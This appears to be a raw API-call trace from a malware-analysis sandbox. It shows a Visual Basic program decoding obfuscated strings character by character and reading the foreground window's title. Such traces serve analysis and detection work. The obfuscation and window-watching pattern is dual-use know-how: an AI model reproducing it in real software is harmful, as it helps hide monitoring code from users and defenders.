WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.747] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0173.747] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.747] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.748] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.748] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.748] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.749] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.749] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.750] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.750] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.750] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.751] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.751] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.751] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.752] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0173.752] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.752] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.752] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.753] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.756] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.756] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.756] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.756] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.756] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.757] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.757] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.757] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.757] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.757] GetForegroundWindow () returned 0x10278 [0173.758] GetLastError () returned 0x0 [0173.758] SysStringLen (param_1=" ") returned 0xff [0173.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0173.758] SysStringLen (param_1=" ") returned 0xff [0173.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0173.758] GetWindowTextA (in: hWnd=0x10278, lpString=0x11644c4, nMaxCount=255 | out: lpString="Goal Join") returned 9 [0173.758] GetLastError () returned 0x0 [0173.758] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0173.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0173.758] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0173.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Goal Join") returned 256 [0173.758] SysStringLen (param_1="Goal ") returned 0x5 [0173.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Goal ", cchWideChar=6, lpMultiByteStr=0x1150ca4, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Goal ", lpUsedDefaultChar=0x0) returned 6 [0173.759] SetWindowTextA (hWnd=0x103c4, lpString="Goal ") returned 1 [0173.759] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0173.759] GetFocus () returned 0x0 [0173.759] lstrlenA (lpString="Goal ") returned 5 [0173.759] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0173.759] IsWindow (hWnd=0x103c4) returned 1 [0173.759] IsWindow (hWnd=0x103c4) returned 1 [0173.759] IsWindow (hWnd=0x103c4) returned 1 [0173.760] IsWindow (hWnd=0x103c4) returned 1 [0173.760] GetFocus () returned 0x0 [0173.760] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0173.760] GetFocus () returned 0x0 [0173.760] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0173.760] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0173.760] GetFocus () returned 0x0 [0173.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal ", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0173.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal ", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=6 | out: lpWideCharStr="Goal ") returned 6 [0173.760] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0173.760] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0173.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.761] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0173.761] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.762] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.762] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.762] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0173.762] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.763] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.763] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.764] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0173.764] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.764] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0173.765] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.765] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.765] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.766] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0173.766] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.766] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.766] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.767] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0173.767] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.767] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.768] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.768] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.768] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.981] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.982] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.982] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.982] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.983] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.983] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.984] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.984] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.984] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0173.984] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.985] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 